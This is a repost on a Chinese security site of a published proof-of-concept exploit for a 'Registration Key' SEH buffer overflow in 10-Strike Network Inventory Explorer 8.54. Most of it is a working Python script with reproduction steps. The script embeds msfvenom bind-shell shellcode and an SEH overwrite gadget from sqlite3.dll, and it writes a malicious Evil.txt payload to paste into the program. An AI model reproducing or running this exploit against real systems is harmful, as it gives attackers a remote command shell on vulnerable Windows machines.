首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (
来源:ihack4falafel 作者:Jawad 发布时间:2018-06-11  
# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)
# Exploit Author: Hashim Jawad - ihack4falafelx
# Date: 2018-06-05
# Vendor Homepage: https://www.10-strike.com/
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Tested on: Windows 7 Enterprise - SP1 (x86)
# Disclosure Timeline:
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
 
# Steps to reproduce:
# - Under Help, click 'Enter Registration Key'. 
# - Paste the contents of Evil.txt and click OK.
# Notes:
# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
# - There is ample space prior to SEH overwrite.
# - Pro edition is effected as well.
# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -f python -v shellcode
# - Payload size: 355 bytes
 
#!/usr/bin/python
 
shellcode =  ""
shellcode += "\xbf\xad\xa8\x1e\x44\xdd\xc0\xd9\x74\x24\xf4\x5e"
shellcode += "\x2b\xc9\xb1\x53\x83\xc6\x04\x31\x7e\x0e\x03\xd3"
shellcode += "\xa6\xfc\xb1\xd7\x5f\x82\x3a\x27\xa0\xe3\xb3\xc2"
shellcode += "\x91\x23\xa7\x87\x82\x93\xa3\xc5\x2e\x5f\xe1\xfd"
shellcode += "\xa5\x2d\x2e\xf2\x0e\x9b\x08\x3d\x8e\xb0\x69\x5c"
shellcode += "\x0c\xcb\xbd\xbe\x2d\x04\xb0\xbf\x6a\x79\x39\xed"
shellcode += "\x23\xf5\xec\x01\x47\x43\x2d\xaa\x1b\x45\x35\x4f"
shellcode += "\xeb\x64\x14\xde\x67\x3f\xb6\xe1\xa4\x4b\xff\xf9"
shellcode += "\xa9\x76\x49\x72\x19\x0c\x48\x52\x53\xed\xe7\x9b"
shellcode += "\x5b\x1c\xf9\xdc\x5c\xff\x8c\x14\x9f\x82\x96\xe3"
shellcode += "\xdd\x58\x12\xf7\x46\x2a\x84\xd3\x77\xff\x53\x90"
shellcode += "\x74\xb4\x10\xfe\x98\x4b\xf4\x75\xa4\xc0\xfb\x59"
shellcode += "\x2c\x92\xdf\x7d\x74\x40\x41\x24\xd0\x27\x7e\x36"
shellcode += "\xbb\x98\xda\x3d\x56\xcc\x56\x1c\x3f\x21\x5b\x9e"
shellcode += "\xbf\x2d\xec\xed\x8d\xf2\x46\x79\xbe\x7b\x41\x7e"
shellcode += "\xc1\x51\x35\x10\x3c\x5a\x46\x39\xfb\x0e\x16\x51"
shellcode += "\x2a\x2f\xfd\xa1\xd3\xfa\x68\xa9\x72\x55\x8f\x54"
shellcode += "\xc4\x05\x0f\xf6\xad\x4f\x80\x29\xcd\x6f\x4a\x42"
shellcode += "\x66\x92\x75\x7d\x2b\x1b\x93\x17\xc3\x4d\x0b\x8f"
shellcode += "\x21\xaa\x84\x28\x59\x98\xbc\xde\x12\xca\x7b\xe1"
shellcode += "\xa2\xd8\x2b\x75\x29\x0f\xe8\x64\x2e\x1a\x58\xf1"
shellcode += "\xb9\xd0\x09\xb0\x58\xe4\x03\x22\xf8\x77\xc8\xb2"
shellcode += "\x77\x64\x47\xe5\xd0\x5a\x9e\x63\xcd\xc5\x08\x91"
shellcode += "\x0c\x93\x73\x11\xcb\x60\x7d\x98\x9e\xdd\x59\x8a"
shellcode += "\x66\xdd\xe5\xfe\x36\x88\xb3\xa8\xf0\x62\x72\x02"
shellcode += "\xab\xd9\xdc\xc2\x2a\x12\xdf\x94\x32\x7f\xa9\x78"
shellcode += "\x82\xd6\xec\x87\x2b\xbf\xf8\xf0\x51\x5f\x06\x2b"
shellcode += "\xd2\x6f\x4d\x71\x73\xf8\x08\xe0\xc1\x65\xab\xdf"
shellcode += "\x06\x90\x28\xd5\xf6\x67\x30\x9c\xf3\x2c\xf6\x4d"
shellcode += "\x8e\x3d\x93\x71\x3d\x3d\xb6"
 
buffer  = '\x41' * 4188                                # filler to nSEH
buffer += '\x75\x06\x74\x06'                           # nSEH | jump net
buffer += '\x7a\x49\xe8\x61'                           # SEH  | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll]
buffer += '\x90' * 8                                   # nops
buffer += shellcode                                    # bind shell
buffer += '\x41' * (5000-4188-16-len(shellcode))       # junk
 
try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except Exception as e:
    print e
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·10-Strike Network Inventory Ex
·10-Strike Network Scanner 3.0
·WebKit - not_number defineProp
·WebKitGTK+ < 2.21.3 - Crash (P
·Clone2GO Video converter 2.8.2
·PHP 7.2.2 - 'php_stream_url_wr
·Linux Kernel < 4.16.11 - 'ext4
·Apple macOS Kernel - Use-After
·Microsoft Windows - UAC Protec
·Apple macOS/iOS Kernel - Heap
·CyberArk < 10 - Memory Disclos
·TrendMicro OfficeScan XG 11.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved